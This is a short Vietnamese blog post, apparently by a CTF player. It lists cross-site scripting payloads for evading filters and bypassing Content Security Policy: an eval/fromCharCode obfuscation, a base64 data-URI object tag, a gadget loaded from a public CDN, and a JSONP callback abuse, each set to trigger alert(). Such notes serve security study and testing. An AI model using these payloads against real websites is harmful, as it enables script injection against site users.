Đừng chú ý vào các tag, nó chỉ hỗ trợ 1 phần, ngoài ra còn có thể sử dụng các hàm như eval() của js để thực hiện, cộng chuỗi thêm bớt mảng,...

eval(String.fromCharCode(97,108,101,114,116,40,49,41,))

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgyKTwvc2NyaXB0Pg==">

    <script src="https://unpkg.com/react@16.7.0/umd/react.production.min.js"></script>
    <script src="https://unpkg.com/csp-bypass@1.0.2/dist/sval-classic.js"></script>
    <br csp="alert(1)">

<script%20src="https://accounts.google.com/o/oauth2/revoke?callback=alert(31337)"></script>

https://html.com/character-codes/


Nhận xét

Bài đăng phổ biến từ blog này

KMACTF và nỗi buồn éo làm được gì cả T__T